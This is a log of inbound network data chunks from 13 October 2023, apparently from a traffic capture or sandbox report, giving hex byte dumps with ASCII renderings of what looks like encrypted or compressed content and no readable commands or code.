2023-10-13 13:21:14 UTC	5470	IN	Data Raw: c0 cc 71 21 00 67 74 3e 0e bb 9d fd 40 42 6c 55 79 01 c0 17 10 59 c0 e1 d2 5f a2 e4 f1 e0 dd ab 3c 02 27 b5 0b 71 56 a2 b9 38 f9 9b 46 37 d8 41 66 64 d9 3d f8 8c 60 39 3c b4 e6 b5 c5 d0 76 e4 04 4f 14 96 4e ee a5 5a 09 85 c4 af 9c cb 97 d6 96 08 4b 59 2e 50 28 6a fd cd 13 c1 ad 88 6f b6 10 bb a4 18 b8 e9 9d 42 b9 76 db e3 f9 01 a2 04 fe 48 3c ff 1f 15 ea 1f f9 29 e0 66 b6 9a 7d bd e9 93 b5 ea 1d 29 63 2e 32 37 75 a7 80 d8 e4 e3 f8 63 09 3e c1 ea 39 eb 19 a6 1f 40 fd 3a 6e ca 17 b2 5c 3a 36 79 71 d7 42 09 8f cc 09 dc a0 c6 eb 1a 1e 4a 5c 48 58 16 97 69 26 68 79 bb ce a7 3c 7f 2b 6e 2f 57 af d6 65 9b 0c f5 74 1e ea f8 5c f5 ab bf a8 78 1e a1 4c ff b8 c4 a6 7d 75 43 09 fc 33 37 0a 75 97 2d 53 fb a1 eb 87 1b 8d c6 93 0a 7b ff ad d9 97 16 59 a8 79 ad 2b cb 70 Data Ascii: q!gt>@BlUyY_<'qV8F7Afd=`9<vONZKY.P(joBvH<)f})c.27uc>9@:n\:6yqBJ\HXi&hy<+n/Wet\xL}uC37u-S{Yy+p
2023-10-13 13:21:14 UTC	5486	IN	Data Raw: c3 0a f9 b0 4f 17 a6 bd b6 e6 25 f6 a2 cd 15 3e 8f 6b 41 2b 99 bf a7 d5 e5 a1 4a 3f 2a 8d dc 65 d2 34 e2 f8 b6 04 e8 57 c8 ca 9d ab 74 e6 84 40 5e b8 3b 4f 53 61 34 09 d1 ba 48 d9 82 37 5f f4 8e d0 37 63 82 db a7 c0 bc 3a 9c e7 b6 04 1b 4f ed 11 75 98 83 60 84 03 30 6a 87 3c 44 f6 63 2e d6 d7 2f 03 77 aa 47 11 c7 ec cd dd af 5a d0 86 4c 18 d0 a3 c4 c0 92 d9 67 00 76 0f 62 d7 ba 19 e1 bf f9 66 1b 3d a0 2f bd eb 81 96 54 d0 de 64 bd b0 5a f1 e2 8f f7 e7 19 b0 33 7f 91 45 89 15 82 fb 89 e0 70 03 3d ef 82 a8 96 dd 3e ad 90 86 6a 1e 69 d2 2c d3 c6 e4 66 ef ea df d0 f1 f2 ac 33 66 64 88 ee 98 a0 4f 80 9d 1c f8 e4 e3 09 87 85 14 3a c3 b8 d8 d9 52 36 87 ba 0f 42 5b 01 bf 10 d0 86 f2 41 72 53 b9 22 85 68 c4 24 39 17 48 30 de 0f be 60 ee d2 2a 6e c9 83 eb 8a 1b 99 Data Ascii: O%>kA+J?e4Wt@^;OSa4H7_7c:Ou`0j<Dc./wGZLgvbf=/TdZ3Ep=>ji,f3fdO:R6B[ArS"h$9H0`n
2023-10-13 13:21:14 UTC	5502	IN	Data Raw: 27 d7 0b b2 24 30 0f 65 77 8a 11 5c 3e 82 95 8f ec d9 dc 0f 79 d2 9e 40 0a 1f 3a 7e 4b 6b d5 c5 65 6e af 0a 9f 89 b3 75 5a ce e0 12 3f 17 f7 15 7d ed 37 52 27 3c 80 d1 dc 21 ca 17 c0 19 b2 4d 84 47 0d e0 f2 57 4f 3b 3f ba d2 72 f8 fc 6d 99 03 06 7d c0 f7 2d 33 dc 57 9c 61 89 af 28 93 7a 93 dc 43 a8 8c 38 2c 5b f8 7d 57 15 a0 9c 12 18 48 d6 da f0 58 38 74 3f 06 e5 d7 33 dc 24 a6 fc 17 b9 16 98 fe 27 b5 28 24 cb e8 42 3d 48 4f 24 0e 8d 78 f0 d4 dc 7e d4 2c f2 75 27 31 62 9d 58 2a 67 74 4c e3 1f 01 64 c9 d3 43 5f 74 fd b8 61 54 a2 32 42 25 30 91 2f 72 75 8e e8 d6 9b 5c c8 bf bc 41 3c 82 0b 0e 2d f1 c8 01 69 8a 75 cb 11 2e f3 d0 ea 39 5d 90 bd 5f 2b 15 8b 5a d0 40 08 2c 27 06 14 81 96 5e 97 30 71 07 29 e8 95 67 9d 47 98 82 98 b4 f8 0d f5 8c 2c 41 c2 92 74 b3 Data Ascii: '$0ew\>y@:~KkenuZ?}7R'<!MGWO;?rm}-3Wa(zC8,[}WHX8t?3$'($B=HO$x~,u'1bX*gtLdC_taT2B%0/ru\A<-iu.9]_+Z@,'^0q)gG,At
2023-10-13 13:21:14 UTC	5518	IN	Data Raw: 2a 8d e9 be 6f e1 1b 8f a7 4b e4 91 13 95 52 2e 10 86 60 0f 7e 27 1b eb c4 26 2d f4 07 e9 93 24 0d ae ec b8 e2 c0 ba a3 25 17 f0 a4 21 9d 5e 66 17 69 d9 83 6d 6c 9a 7d 9e 18 a1 5e 9e 81 96 53 09 e5 80 2a f3 ec 48 8a 41 f7 ce 76 dd d4 1b 92 9a 09 c0 b2 b6 a7 8f fe 29 57 f0 a5 95 0d 74 27 37 d7 c4 45 3a ec 1b 4b ab c3 67 a3 55 d5 d6 15 69 1e 94 a0 13 54 42 6e 25 43 cd 7a d4 99 86 a4 4b 18 62 ff 70 60 19 7a a5 50 a4 0d 59 77 f0 84 42 34 f0 a2 30 b0 57 ae b7 ea 66 55 2d 92 49 09 77 8a 18 12 58 15 a2 d5 f6 17 4a 55 2c 58 17 1e e7 b6 4c 4f 94 aa 85 bd ae d8 fd 28 e3 be f5 32 63 b5 9c 54 e7 50 d8 9b 24 58 7a 30 20 af bc 08 9e b7 ea 4b a4 2d 41 55 ac e4 60 0c ac e0 92 fd 90 fb 8e 89 9d 21 34 c4 3d ca bb 8f b0 0d ec 2f 47 5c 1b c2 6f db 89 0f a2 5b b5 59 9a 50 9a Data Ascii: oKR.`~'&-$%!^fiml}^SHAv)Wt'7E:KgUiTBn%CzKbp`zPYwB40WfU-IwXJU,XLO(2cTP$Xz0 K-AU`!4=/G\o[YP
2023-10-13 13:21:14 UTC	5534	IN	Data Raw: 06 cb 79 e5 b4 c4 e0 d4 d5 d2 15 db e9 53 f5 ff d9 f9 3a a0 92 bf 18 f5 36 b7 ad 11 d1 01 4a fc 49 c7 00 65 0d a8 44 03 82 74 df ec bb fb a2 9b 5a e3 5a be be d0 62 31 93 13 dd cc 6e 5a 0c 63 68 bc 21 ad 81 16 df 0a ca 6b d3 e2 30 42 56 f3 bf 71 2c 93 2f e6 08 9d f0 02 69 ae 6d 2e d0 96 d8 a9 ea 8f fb 24 67 af 01 2c bd 00 bc 94 64 dd de 37 e6 60 cf 97 4d 2e f9 07 09 93 5f 81 82 a9 dd ef ab 8e b3 5f 36 b3 09 69 56 cc f9 e3 ad 6c f7 24 4b 9f 34 ff 3f 43 6e e7 01 f3 4d 43 08 37 67 28 dd e0 e7 67 d5 cc 87 78 92 d9 f4 a5 ff 54 91 2f f1 79 11 3e c4 c3 51 87 c1 4d e9 e9 84 85 a9 e8 aa 3d db 2a 33 20 ea d7 dd 4d 25 87 dd bb f7 4d d2 7e 50 6f 92 98 a2 34 90 48 c2 94 a1 29 b8 ab 6c 53 9e 11 b9 02 9c 61 8e 8d 42 5c 9f 20 33 01 61 e9 80 f6 4c 45 19 48 dc b6 04 5e 45 Data Ascii: yS:6JIeDtZZb1nZch!k0BVq,/im.$g,d7`M.__6iVl$K4?CnMC7g(gxT/y>QM=*3 M%M~Po4H)lSaB\ 3aLEH^E
2023-10-13 13:21:14 UTC	5550	IN	Data Raw: 89 72 3f df ca 8e 95 7c 25 3e 6b 56 68 32 a4 29 9e e0 d9 31 12 3c 50 23 f1 2d 7d 20 01 3a 92 44 b6 95 bb 06 17 fb e3 bb ae e4 e3 74 bf c8 f9 19 83 af b4 45 2d a0 5c bd 03 0b 21 0a 3b d6 b3 d0 f0 37 e3 dc 33 b7 9c 98 40 22 24 84 6d 15 c4 95 17 3d b9 a7 6a 62 6a 32 72 d8 e2 25 0a d4 0d df 15 0d 4b 95 3d 70 2c 70 5f 55 f3 4b 42 a9 d6 67 5e fc 5e 2e 9b dd 4d 04 a8 de b4 51 18 b6 ad c0 08 56 35 ac a2 2d 75 99 a6 85 b5 c4 d9 8b 14 1d 41 99 61 e0 09 66 95 18 ab bd b6 8a d8 cb 63 98 34 aa 15 5a af 9f 04 b0 d2 e3 32 89 a5 7b be 02 a3 de 96 a3 41 ad c4 57 6e a1 9a c0 2b 50 e6 60 67 dc d1 97 8f ad 68 41 b8 c6 69 d9 1e 6d dd a3 db c3 23 62 97 9a 08 56 71 86 af 0e 60 fa fe a2 b3 0f 2a 47 42 6e 53 5c 80 ef 47 3a 74 48 57 ee fe eb 70 28 29 36 94 58 59 43 33 b5 7f 08 16 Data Ascii: r?\|%>kVh2)1<P#-} :DtE-\!;73@"$m=jbj2r%K=p,p_UKBg^^.MQV5-uAafc4Z2{AWn+P`ghAim#bVq`*GBnS\G:tHWp()6XYC3
2023-10-13 13:21:14 UTC	5566	IN	Data Raw: 88 5a a0 34 7c 40 7c b5 e1 11 13 01 53 8c 9c f4 27 80 0a 35 1c bd a1 dd f2 9c 98 6d 12 0e b4 94 4d e4 57 0f 3a 92 9b 2e fe e2 52 d4 05 17 42 34 b0 69 f9 2b 1c 08 a8 3f 52 af 51 cd db 81 1c f8 8c 9e 33 8c e8 26 8d f9 32 ca 27 03 fc ec ec 64 ea 63 41 44 9c a8 01 79 97 3b 1f 9b 14 ae ea e9 21 24 f6 2e d9 7f e0 23 88 78 7e bf 96 e2 ef 91 9e 5d 43 a0 b9 c0 d1 86 aa b1 a0 eb d1 25 64 c4 eb 83 95 04 00 f3 22 37 19 1b 2e 36 1d ec c2 4b cb eb e7 7d 06 f8 2a 3c fb d5 25 f8 05 8d d9 f4 ee ef 15 bc 55 37 bc 8a a8 43 14 b5 75 4b 40 00 c8 fa 77 74 52 b0 49 bf 00 5f ea 50 04 9c 54 8d 7e 1b 80 5f bc 91 fe ce 3e 43 87 44 c5 bf 8c d0 71 5c 10 f5 89 29 f4 8e 9f 73 82 c3 a6 1d 7b 16 e5 0a dc 20 bf 08 d0 db 65 b7 11 db e8 19 ae 6b a8 d9 ce 93 6a b8 03 bb e5 c9 de 76 9d 7c 2f Data Ascii: Z4\|@\|S'5mMW:.RB4i+?RQ3&2'dcADy;!$.#x~]C%d"7.6K}*<%U7CuK@wtRI_PT~_>CDq\)s{ ekjv\|/
2023-10-13 13:21:14 UTC	5582	IN	Data Raw: ff d5 60 af 48 26 ba ce 50 12 e8 08 84 19 41 12 c5 68 cb 85 66 4b 9f cc 26 1a b5 16 db 5d d9 6b 60 49 0d b6 46 03 e1 9d 1f a6 9e aa bf 3c b9 82 c7 94 f6 63 9d 21 80 6e dd a1 5e 24 14 c8 43 26 30 a2 fc 38 7b 5f 32 e5 d9 ae 4d 21 95 8f 98 3f c3 a6 90 7e f1 63 ef f4 2b e7 b1 1f 80 fc e3 c1 dc 6d 9b ec b3 c5 ec fe d1 7f ff ec d0 9e f9 95 73 60 e1 02 ad 06 98 f7 10 78 06 06 75 da bb 96 4d 7f c0 ac 8d 40 c0 50 8b 5a a8 15 18 4c 29 e7 94 6b 41 53 04 69 dc 55 20 6e a6 3f db cd 01 ee a5 20 57 8b 78 8b c5 0f a5 ce 68 fd 90 39 7a f6 4a 8e 98 ea cf 31 0f bf 94 11 12 e2 0b 7c 9a d4 56 91 e1 8b bc fd f4 26 b7 0f d9 7b c9 b6 81 61 c4 1e 9b c5 02 4a d3 51 62 29 4f 7a 77 00 ee 92 79 c6 83 d2 2d 19 d4 85 0c 7f c8 1a 62 01 e0 9b 4c 62 66 d3 69 91 72 d1 87 3d ed e5 b1 fa 4f Data Ascii: `H&PAhfK&]k`IF<c!n^$C&08{_2M!?~c+ms`xuM@PZL)kASiU n? Wxh9zJ1\|V&{aJQb)Ozwy-bLbfir=O
2023-10-13 13:21:14 UTC	5598	IN	Data Raw: e2 f3 bb ab 8d a0 f0 48 01 fd 4c 72 12 ed de 6b 9b 56 0d db 1c d3 c4 1c bb 45 4a 0b 66 8c 91 cc 5e 71 d4 84 da dd 06 e3 1c 42 01 cc a7 91 eb 9e 8f 5d f4 07 a6 e5 5c 91 ec 9a ab 7c b5 8d af 18 6e f6 ae 03 7a 12 9b 29 63 05 3c a1 47 5a 9e b9 5a f6 42 9d fc 33 14 2e f4 f6 68 cc b9 7b 72 19 36 17 06 30 06 7e 5e 2f 4d 22 3b c2 bb 10 f0 a8 19 1b 3e 10 cf a5 08 aa 67 4c c8 0b c6 2b 6c 25 d1 c1 12 36 01 d3 5b fe 45 a7 c4 44 cd 65 cd ee 23 31 9c a5 f6 d8 42 02 f0 da d0 5a c1 cf 37 c3 e4 72 34 c1 b6 33 30 42 4e fb af 94 fe c6 11 27 1a 37 de ae 71 fb 43 b4 97 06 8e a6 06 9a d5 d7 4b 84 38 2b 44 7a aa 60 a2 25 e1 17 6f 80 bf fe aa 1f 38 a6 db 83 e9 88 fd ed cc f9 76 59 11 ea a2 14 83 bc 3d c9 b7 c4 6f de 14 2a 42 f2 ff 39 aa 39 1c 05 93 a7 3f 5f af 3c 87 0d 63 71 49 Data Ascii: HLrkVEJf^qB]\\|nz)c<GZZB3.h{r60~^/M";>gL+l%6[EDe#1BZ7r430BN'7qCK8+Dz`%o8vY=o*B99?_<cqI
2023-10-13 13:21:14 UTC	5614	IN	Data Raw: 8c f3 f1 c5 07 3c d8 e7 b7 f9 b7 f6 33 eb c1 40 83 99 9d e4 6b 3c 5b d7 0d 86 b0 1e 7e d2 6e a2 1b 79 b4 4f fc c1 cf 1d f7 6f 5b 82 80 eb 75 71 a1 fc 9e 15 b5 f4 8b 46 d6 85 b6 bf f2 2a 36 e8 8f 70 92 60 4c 82 3b f0 89 6d d7 f9 24 a5 00 48 b8 86 ff 12 e6 90 b7 61 78 80 54 c1 73 1b ee 24 8c de 15 2f 4a d5 31 41 f3 7c aa a6 be 17 85 21 4e 83 6b c9 83 26 fd ad 55 ec 93 07 c1 d4 e0 c2 53 0f b6 c0 2a b6 33 dc bd c6 19 8c 94 39 b5 a4 2d f7 93 64 f2 be 21 b0 a4 f1 77 e4 19 86 07 d4 d9 b8 2a f2 5f 31 f2 b1 20 69 78 6a ec 35 f4 97 64 4d 32 b9 02 09 b6 1a 75 e4 57 08 2a ff c0 50 13 48 ef b6 42 51 d4 f4 c7 77 65 7a 4c 4a 03 c2 ab 92 f3 00 f1 7e ef 8b 02 3a 15 4a 21 cf 67 32 45 14 be f8 f1 3d 1a 07 75 7c f7 ed fe 14 27 9e a2 4f e7 78 99 85 c1 b4 1e c6 60 03 e8 67 3d Data Ascii: <3@k<[~nyOo[uqF6p`L;m$HaxTs$/J1A\|!Nk&US39-d!w_1 ixj5dM2uWPHBQwezLJ~:J!g2E=u\|'Ox`g=
2023-10-13 13:21:14 UTC	5630	IN	Data Raw: 47 5c 06 5b 46 71 0a b5 ff 77 66 64 ce 1e dc b9 72 5d 5a 47 0d 00 d4 44 76 e7 02 46 05 09 9e 5d f7 53 fb fb c8 29 49 07 c1 9b cf 61 50 e8 03 36 bc 73 bf 1a f3 ae ed fa 70 91 fc 43 35 4e 26 32 48 af 9b 95 f6 e0 65 ba 31 0d d2 7c 34 f8 f7 d3 87 39 ac 63 78 c6 06 72 97 86 e2 9f 5e 09 46 1d 5f 39 f7 43 1b 26 b3 b4 28 d8 0f 68 e6 23 66 b2 50 fa 31 d5 8c 2b bf 5a 82 85 93 a8 b9 99 17 13 24 b1 81 18 a1 90 77 e6 bc e5 d0 58 15 93 62 cb 03 ee 26 0c f6 3e fc 2e 1a d6 4c b6 ba cc 38 4e 73 b9 f0 ab 5c 7c 32 19 7d 84 8b 15 a0 6d 5f 2b b4 c0 22 c0 97 ea 97 61 a2 ea 29 9b 49 fb e2 97 f1 a8 0c b4 ce 21 28 9a dc 96 5f 3c c6 b1 1b 61 22 31 cd d6 1c 1b 6f 49 a5 f6 1a ed 0a 25 63 f1 3f 09 c1 f6 bc b6 75 9c e8 8c 89 08 34 08 82 d0 69 b4 1b 91 6c 61 b3 7f 55 b3 ca 87 61 1d fc Data Ascii: G\[Fqwfdr]ZGDvF]S)IaP6spC5N&2He1\|49cxr^F_9C&(h#fP1+Z$wXb&>.L8Ns\\|2}m_+"a)I!(_<a"1oI%c?u4ilaUa
2023-10-13 13:21:14 UTC	5646	IN	Data Raw: e9 ba 08 99 f9 5c e8 b3 0d 17 cb 81 94 eb 50 a7 07 eb 34 c5 0b 23 51 59 93 0a e0 ba f8 86 8c 64 80 a0 87 52 50 d7 c0 0b b1 df 0c f8 32 01 77 e7 e5 71 03 1f 98 9b e4 dc de 1a e9 69 b4 b8 bc 14 95 86 07 c4 3f f6 52 e9 27 e6 68 e8 84 f9 dd 8f fc d8 11 b9 88 3b 19 2c ce ce 08 c7 cd 59 9a 0b c0 64 0b 3a 7b 6e 60 d2 b2 0f 1c c1 0d d8 f7 23 8a de 49 5f 3d af 8d 13 22 5d be 20 17 16 45 61 93 01 70 b7 88 ba 97 dc 6f d9 7f 4f fe ca 50 38 70 4d 04 c1 67 0b 77 69 95 76 ad cb bf 93 aa 10 5b 56 ed 81 21 a7 84 f5 09 81 64 14 35 1f e6 39 8d 15 20 68 af 78 9e e4 fb ea cd 08 d5 d5 1c 43 3d f7 78 cc 60 fc 2e 4b 3e 76 07 d5 50 f8 6e 25 32 eb 9a 1c 2a bd 46 24 2b 34 ba 73 87 6c b2 36 e3 5c 54 f3 c6 98 5e 98 5e 65 09 d2 f1 55 c3 ac 62 b4 0c 94 03 87 d1 18 32 0b e7 07 92 0d 34 Data Ascii: \P4#QYdRP2wqi?R'h;,Yd:{n`#I_="] EapoOP8pMgwiv[V!d59 hxC=x`.K>vPn%2*F$+4sl6\T^^eUb24
2023-10-13 13:21:14 UTC	5662	IN	Data Raw: c7 af fb b9 46 85 1c 8b db 54 27 e7 c1 38 d0 d4 e3 f9 eb 3d 7e 76 4f 33 68 30 8e 29 f4 c1 11 11 8d 67 22 70 b2 d8 95 b6 4a 45 19 8b 02 66 aa 59 7e ff 3a 21 8d 5a 6b e2 1e 05 1c b9 68 83 48 02 07 b9 73 c5 d5 c6 48 69 e3 a0 40 28 ae 5d 57 43 cd ef 20 cc 97 5f 24 e4 85 19 7f 0c d3 c8 61 fe bc 5a 53 f0 38 97 7a 46 13 0a 31 f6 00 94 fc 96 27 b8 d5 eb a6 58 4d d3 95 23 56 19 59 de 1c 17 16 9f 6d e6 36 3f 84 b3 19 f3 58 f2 30 ac 9a 1b 47 96 46 75 55 29 a5 63 0c 5c 30 8c f0 fd f8 43 59 db 17 4d b0 5b 34 d3 13 14 c2 68 d4 78 42 b6 12 34 fb c8 df 57 0c 10 89 21 97 35 e2 6d eb b1 5c 73 75 19 ca 1e 55 7b c0 23 91 78 b8 77 40 88 f4 23 f1 50 d2 56 11 73 b0 24 eb bb 79 37 04 71 ea b3 9c 7b c0 d4 fa 95 28 40 a7 13 51 6a b1 6a 84 8c 12 8e 27 e0 a8 4b 16 c1 f6 bd cf 61 72 Data Ascii: FT'8=~vO3h0)g"pJEfY~:!ZkhHsHi@(]WC _$aZS8zF1'XM#VYm6?X0GFuU)c\0CYM[4hxB4W!5m\suU{#xw@#PVs$y7q{(@Qjj'Kar
2023-10-13 13:21:14 UTC	5678	IN	Data Raw: 5a c9 fa 46 c8 c1 61 a4 5f c9 39 57 4a c7 59 b9 99 13 cc 36 6b a4 3a c5 cd e5 b9 e2 e7 f4 86 aa 2d 8e f1 ad 2e 56 45 ad 61 73 66 04 f6 2d 73 18 e0 3f 97 53 3c 7e 99 4a 27 0d ac 59 92 ec 8a 55 4f 20 9c 59 2e 41 47 c2 95 22 4b 0d 0e 85 e9 95 ed 86 d9 4c 6d 61 8a fb 11 ad ef 09 03 d3 3f a5 89 a9 e5 d6 75 dc ff 30 c9 95 bd 66 36 73 52 e1 55 3b 13 8d 95 81 3f 6b ce c3 31 aa ed da 99 fe 22 14 7d e1 c7 56 41 6f 10 6a c7 2b 8f 4d 91 5b 77 95 63 12 c3 b4 b8 0d 48 14 ee 01 8d a8 0e 5c c5 bc e7 05 11 b1 fb 3e 30 86 04 93 42 45 e9 27 ca d0 91 dc 75 76 c0 1b 33 d4 da d8 ed 77 b3 7d eb 6c 43 29 f5 e3 17 ee 19 5b ee e3 e2 02 67 bd 1e 4f da bb 93 80 20 8c d8 88 95 d1 ee 91 39 f2 56 f2 e4 1b 74 87 ab 19 17 81 91 84 14 c9 93 cb 29 6d cc 20 88 1c b4 3b 92 38 9c 45 26 f7 e6 Data Ascii: ZFa_9WJY6k:-.VEasf-s?S<~J'YUO Y.AG"KLma?u0f6sRU;?k1"}VAoj+M[wcH\>0BE'uv3w}lC)[gO 9Vt)m ;8E&
2023-10-13 13:21:14 UTC	5694	IN	Data Raw: d3 41 63 34 27 c1 fc 01 52 48 5e 07 72 09 9b 88 2b 5d f7 42 a4 a7 56 d0 3a bf 93 31 d8 2b ff af cf f4 43 3f 47 01 fe b3 6b 28 87 c3 8c a7 ea 1a 8e cc 41 a6 af d1 7c a6 7b 55 00 e7 23 e4 39 5d b2 54 c2 29 4e 31 1d 12 7e b9 99 f1 cc a4 17 e8 48 62 cc 9e a9 69 98 16 fa 41 45 64 62 09 52 e5 23 ab 81 80 be 1e 4c 20 0b f4 d7 f6 02 5a 98 c7 d3 87 b8 bb c8 90 51 c3 57 29 87 41 7a 6c 51 9a 41 43 8a 15 5d bc 79 7b d1 25 22 95 37 3e 36 79 73 89 50 11 79 62 af 45 fb ed be 54 f4 b8 9c d8 39 4a f6 5c 4f d6 4f 89 cf 32 27 8a 90 91 88 c6 97 a6 ec 81 a0 b1 1a f0 4e 92 16 a7 64 82 40 9d 49 2e fc b0 21 f8 74 dc c6 9c a8 50 ac 14 9b 3b ed 15 15 7b 5b a4 a9 f4 59 6c 53 19 b9 8e 61 2d d4 82 93 1b 19 2f c1 d4 98 f4 9d 49 9b 56 fc 6e fe 16 a5 36 87 60 d2 69 2e f2 08 1e d6 88 8e Data Ascii: Ac4'RH^r+]BV:1+C?Gk(A\|{U#9]T)N1~HbiAEdbR#L ZQW)AzlQAC]y{%"7>6ysPybET9J\OO2'Nd@I.!tP;{[YlSa-/IVn6`i.
2023-10-13 13:21:14 UTC	5710	IN	Data Raw: ce 37 98 cb 4a 86 58 9d ac 7f 84 67 ed c9 4a 5a e4 3b 1c a6 18 4a 5c 5b 0d 42 a2 f1 0a 30 d5 bc 8d c7 37 18 0e af f1 d8 45 4c c9 9a 28 a9 c2 3a e8 3c ec 73 20 3e c2 37 cc f6 66 dd 52 24 5f 2d 2c b5 1f a4 1c e4 ff 39 50 39 25 ce f5 3c 40 46 7d cd 1c cb ba 92 4e 0f 4e 76 fd 65 14 08 39 5d 7d 65 e6 bb 02 70 39 2a 2a e0 57 61 8a b6 6d 52 b3 0d 51 2d f7 63 5f e4 11 06 25 fc 33 53 e0 10 fd 88 7e 51 22 27 eb d0 80 ed 81 23 c3 72 85 20 04 3b 95 32 fe 17 71 3c 6c 5e 92 4c d0 b4 fd bd dc 57 2b da fd e2 74 a8 71 26 f9 5a 05 8a 0e 84 50 88 66 06 af 03 0c df 8a 70 4b 6f be f8 3f 5c 7f ed 67 8b e2 ce 86 ae bb 45 3e 61 2a d8 4d 6f 2a 77 2d a3 3f 12 b9 ad 6d 12 af 62 c5 b5 cb 4b ee 9a 66 62 da 7d 19 58 1d ae 14 ac 17 e0 2a 2b d0 a6 2c c9 4f 1f d2 e8 0f d8 0e da 58 47 89 Data Ascii: 7JXgJZ;J\[B07EL(:<s >7fR$_-,9P9%<@F}NNve9]}ep9*WamRQ-c_%3S~Q"'#r ;2q<l^LW+tq&ZPfpKo?\gE>aMow-?mbKfb}X+,OXG
2023-10-13 13:21:14 UTC	5726	IN	Data Raw: fc 74 f0 b4 61 af bf 32 86 c9 91 7b bd 93 54 25 41 e6 46 d1 03 dd ab 04 76 f1 38 f5 9a e3 af 80 ab 84 85 55 88 2d 75 d0 53 ff ef fb a5 42 95 25 3e a4 f9 f5 a1 14 50 db b3 84 a6 e7 08 e8 4c cc 5a e0 8a 46 14 36 d8 f1 40 5a f2 8f ba 28 eb 27 9a 9d 58 2f 94 21 42 4c 7d 53 9f fd 0b 54 f9 a4 f0 fd 0d 2e 37 91 70 6a ce 7b 52 ce be 2b 98 72 11 f9 4d 2a 20 64 1a f4 24 41 1e 55 b1 d0 50 4d c9 87 e0 c0 77 db 65 dd dd 6b fa a9 10 c6 71 17 56 87 ab 80 5d 0c 8e 15 64 58 ff b6 27 5e 3b d6 de 25 ab 19 a5 37 c2 a2 f8 a3 35 20 a0 3a cd 07 aa 6a 76 d9 d8 2a eb 5b b8 72 24 92 4e 89 31 b0 99 30 68 37 f0 38 c6 95 9d 8f aa 27 98 89 30 63 c9 9a a7 05 e0 9c e0 e5 0e 29 f6 c9 fb 53 58 d7 18 45 dd 22 fb c3 c3 99 88 a5 69 59 be 5c c3 0f e0 f0 a3 a0 76 22 a8 6a 3b 6a b1 7e 97 3a 9d Data Ascii: ta2{T%AFv8U-uSB%>PLZF6@Z('X/!BL}ST.7pj{R+rM* d$AUPMwekqV]dX'^;%75 :jv*[r$N10h78'0c)SXE"iY\v"j;j~:
2023-10-13 13:21:14 UTC	5742	IN	Data Raw: a7 b1 81 f5 95 db 79 10 a5 2b 3b 4d 37 48 d2 ce eb 60 54 22 4a 86 f4 c1 90 9f 37 c1 74 06 20 6e 72 36 f5 df 2c 84 39 29 97 94 99 a3 bc 82 a1 aa f3 13 b0 75 53 63 63 d1 9e f8 d5 db 4d 66 b7 52 84 56 9e 8b f2 ab 87 83 cc 9f 61 a6 6b 66 1c 2c cc a5 ab 03 0a 4f da 03 d2 de 5b ed 9d c3 0d cd e1 e1 29 ad 19 1e c3 46 0b ff 11 04 8b 2f bc e0 1a 4e 89 60 77 1d 4d e9 1b a6 55 dd fc 5e 1b 6c 27 37 c2 cb 2e 4a 7c 16 84 ee 03 86 e5 38 9c 8b 8e a8 ee fe b7 21 35 57 dc 0e 1f 23 7e cc 0f 5f 8a 6c 1c 92 ab ce 92 a6 21 3d 1d fa da 0d 9f 91 07 e6 d3 39 84 42 b1 d6 95 38 cd db fe 12 1a e7 30 38 34 bc 95 21 95 46 d5 8b 12 6d 97 a5 ac e4 19 fd ff 54 70 45 ee 93 f5 b4 8c 7d f0 4c b6 9e 3c 71 a3 2a ee d2 ee f6 ef 64 f3 95 6e 84 da 4a 5f 65 2d da 34 44 be f4 89 fc 4a a6 3a 6e c2 Data Ascii: y+;M7H`T"J7t nr6,9)uSccMfRVakf,O[)F/N`wMU^l'7.J\|8!5W#~_l!=9B8084!FmTpE}L<q*dnJ_e-4DJ:n
2023-10-13 13:21:14 UTC	5758	IN	Data Raw: d3 42 28 ff cb 32 bc 4f b4 cc 67 89 02 2a ac 36 bf a4 55 4c 05 04 89 78 43 8f ff 5f f6 3c b5 5a 72 6f 89 4b df fb 44 f0 75 e7 82 57 71 bd ee 77 c4 b2 e2 e9 9e 90 97 7a d9 c7 ff 15 99 41 b5 68 84 6f 6c 54 d2 ca 60 91 10 40 9a 87 1e 80 0d 5f c9 11 5e 2c 13 ac d3 ff 13 7d 02 9a 83 4e a6 7d d9 84 59 81 b3 32 13 8c 40 1e 54 5c f2 f7 14 b7 45 00 81 88 78 85 8b 63 78 7f e6 dd 35 75 6b 1e 36 43 c6 64 b5 3d b9 b4 09 34 c6 19 2b ff 73 c1 51 df fb 8a 2b 41 50 58 da b4 02 93 5f 50 48 63 c5 ec 37 b9 5a 5a 15 c0 b9 53 18 48 74 23 6e ea 15 c8 5b 5c ea f9 bb 2c 21 9b 30 14 9a 2b 2e 0c c4 76 d3 3b a8 c1 a8 29 42 8c 2a 65 80 3f 0d 07 0b 70 95 4f 4b ea b3 db a0 7a a7 2e b7 5b b0 98 d7 4e ac b5 45 a8 6c a3 93 4c f5 a4 00 93 e5 7c e4 f4 02 2d ec 40 46 05 04 66 25 c6 76 45 a7 Data Ascii: B(2Og6ULxC_<ZroKDuWqwzAholT`@_^,}N}Y2@T\Excx5uk6Cd=4+sQ+APX_PHc7ZZSHt#n[\,!0+.v;)Be?pOKz.[NElL\|-@Ff%vE
2023-10-13 13:21:14 UTC	5774	IN	Data Raw: 97 b2 21 e7 c6 e8 d5 d8 9b 4b 66 b9 28 ad ca 50 4e a7 cf bc 39 dd 4c 2f ce 43 96 5c 85 93 30 f7 dd 40 18 1c 79 1d 33 d8 b1 84 c0 d3 64 22 26 6e 6f c7 e2 ce 61 8a 21 f8 18 28 50 5a b4 ed fd a5 c5 fc 8c 71 f5 63 b4 78 b0 d2 af bc f6 1f 5e de a5 01 11 1c 0a e5 bf a2 f1 b5 b9 a8 f4 e0 5b 89 fa 78 cc aa 81 c2 24 b6 ed 3b 87 64 1c 15 23 2a c2 1d 42 d3 ba 13 2e 96 ac df a6 e2 7e 62 28 77 f5 35 eb bc d3 34 ae 7d 5d ed d8 7d 83 3a 1b 35 64 9e b0 d3 e6 70 0b 8a 5b fa f9 c2 42 ec 40 bc 8a bd 4a 0c f7 33 ba 4f d7 7f db db 49 fa 83 3d f5 c3 f8 64 60 71 4e 36 ee 4d 5c d1 a4 de 26 ea 97 b7 f0 1a 57 8d 23 33 95 f6 6a d0 70 2d 56 7b bb 9e 49 d8 d8 54 6e 36 f8 39 65 b7 3d c4 73 ac 49 3e 78 cf 2b 66 d4 9b ad b2 9e f1 0e 03 25 b2 2b 26 12 5d 0c 4b b2 cb b7 21 7b 92 a1 69 fe Data Ascii: 